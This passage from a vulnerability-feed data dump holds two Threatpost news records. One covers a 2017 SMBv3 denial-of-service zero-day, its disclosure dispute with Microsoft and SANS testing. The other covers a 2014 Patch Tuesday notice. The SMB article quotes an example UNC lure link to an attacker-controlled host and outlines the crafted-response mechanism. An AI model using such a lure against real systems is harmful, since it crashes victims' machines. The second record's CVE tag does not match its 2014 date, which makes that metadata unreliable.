vulnerability, a remotely triggered denial-of-service bug, low-risk.\n\n> SMBv3 0day, Windows 2012, 2016 affected, have fun \ud83d\ude42 Oh&amp;if you understand this poc, bitching SDLC is appropriate \ud83d\ude42<https://t.co/xAsDOY54yl>\n> \n> \u2014 Responder (@PythonResponder) [February 1, 2017](<https://twitter.com/PythonResponder/status/826926681701113861>)\n\n\u201cWindows is the only platform with a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible. Our standard policy is that on issues of low risk, we remediate that risk via our current Update Tuesday schedule,\u201d a Microsoft spokesperson told Threatpost in email statement. The next scheduled Microsoft update is Feb. 14.\n\nGaffie said the vulnerability is specifically a null pointer dereference in SMB and that it affects Windows Server 2012 and 2016. He added that a joint analysis between himself and Microsoft concluded that code execution doesn\u2019t seem possible through an exploit of this vulnerability. SMB is generally not exposed to the Internet, though Gaffie said that outbound connections where clients connect to remote file servers are more likely to be allowed than inbound SMB connections over an open port 445.\n\n\u201cThis bug can be used to trigger a reboot on a given target, it can be either local (via netbios, llmnr poisoning) or remote via a UNC link (example: adding an image with a link: \\\\\\[attacker.com](<http://attacker.com/>)\\file.jpg in an email),\u201d Gaffie said. \u201cIt\u2019s important to note that this trivial bug should have been caught immediately by their SDLC process, but surprisingly it was not. \u201cThis means that the new code base was simply not audited or fuzzed before shipping it on their latest operating systems.\u201d\n\nGaffie also said he decided to release details prior to the availability of a patch because it\u2019s not his first experience working with Microsoft where they have delayed a patch release for one of his bugs.\n\n\u201cI decided to release this bug one week before the patch is released, because it is not the first time Microsoft sits on my bugs,\u201d he said. \u201cI\u2019m doing free work here with them (I\u2019m not paid in anyways for that) with the goal of helping their users. When they sit on a bug like this one, they\u2019re not helping their users but doing marketing damage control, and opportunistic patch release. This attitude is wrong for their users, and for the security community at large.\u201d\n\nJohannes Ullrich, dean of research at the SANS Institute and director of the SANS Internet Storm Center, said he ran Gaffie\u2019s exploit and could confirm that it caused a crash on a fully patched Windows 10 system.\n\n\u201cModern Windows versions have several protection mechanisms to prevent remote execution for exploits like this,\u201d Ullrich said. \u201cIt would likely be difficult, but not necessarily impossible.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/02/06230816/Screen-Shot-2017-02-02-at-1_29_33-PM.png>)\n\nUllrich published a post on the SANS ISC site describing [his testing of Gaffie\u2019s exploit](<https://isc.sans.edu/diary/Windows%2BSMBv3%2BDenial%2Bof%2BService%2BProof%2Bof%2BConcept%2B%280%2BDay%2BExploit%29/22029>). The PoC would require an attacker to send a link to a victim, luring them to connect to a malicious SMB server instance.\n\n\u201cA URL like \\\\\\\\[server ip address\\IPC$ would trigger the exploit,\u201d Ullrich said. \u201cI have tested it in Edge and Internet Explorer on Windows 10 with a local html file like that and it shut down the system immediately.\n\n\u201cThe exploit implements its own SMB server, so it is as easy as running the exploit, making sure the user can connect (e.g. firewall issues) and then sending the \u2018right\u2019 link to the user,\u201d Ullrich said. \u201cThis is pretty easy to exploit. Took me maybe 10 minutes to get it to work. The exploit comes without instructions.\u201d\n\nUllrich explained that the attacker will respond with a crafted Tree Connect Response\u2014Tree Connect Requests are sent to Windows Servers when users connect to shares\u2014that is lengthy and also includes a \u201clong trailer.\u201d He explained in the SANS ISC post that the tree connect response message consists of a NetBIOS header and message type of a total length of 1580 bytes, and a SMB2 header that is 64 bytes long. The Tree Connect Response message has a fixed length of 8 bytes in addition to the fixed header.\n\n\u201cThis is where the message should end. But apparently, since the total message size according to the NetBIOS header is larger, Windows keeps on decoding in the crafted header (all \u2018C\u2019s\u2019 in the exploit), which then triggers the buffer overflow,\u201d Ullrich said.\n", "modified": "2017-02-03T19:56:30", "published": "2017-02-03T08:36:13", "id": "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "href": "https://threatpost.com/microsoft-waits-for-patch-tuesday-to-fix-smb-zero-day/123541/", "type": "threatpost", "title": "Microsoft Waits for Patch Tuesday to Fix SMB Zero Day", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:54", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft today provided its [Patch Tuesday advanced notification](<https://technet.microsoft.com/en-us/library/security/MS14-NOV>), giving IT managers a head\u2019s up about 16 bulletins that are scheduled to be delivered next week, including five rated critical for remote code execution and privilege escalation issues.\n\nThe heavy patch load is an anomaly for 2014, which has been relatively quiet. The last time Microsoft released anything approaching this many bulletins in one month was in September 2013.\n\n\u201cNext week will tell us how many CVEs are involved but suffice to say, this patch load will be a big impact to the enterprise,\u201d said Russ Ernst, director at Lumension.\n\nExpect another cumulative critical patch rollup for Internet Explorer and four critical bulletins others for Windows. Nine of the remaining bulletins are rated Important by Microsoft and two others Moderate.\n\nOffice software is in the crosshairs of the moderate bulletins. Microsoft said bulletins are on the way for Office 2007 SP3, Microsoft Word Viewer and Office Compatibility Pack SP 3.\n\nMicrosoft is also expected to patch vulnerabilities in Exchange Server 2007, 2010 and 2013, as well as the .NET development framework. None of those are rated critical, likely meaning an attacker would require local access in order to exploit the security issues.\n", "modified": "2014-11-06T19:34:02", "published": "2014-11-06T14:34:02", "id": "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "href": "https://threatpost.com/microsoft-ready-with-16-patch-tuesday-bulletins-5-critical/109223/", "type": "threatpost", "title": "November 2014 Microsoft Patch Tuesday Security Bulletins", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}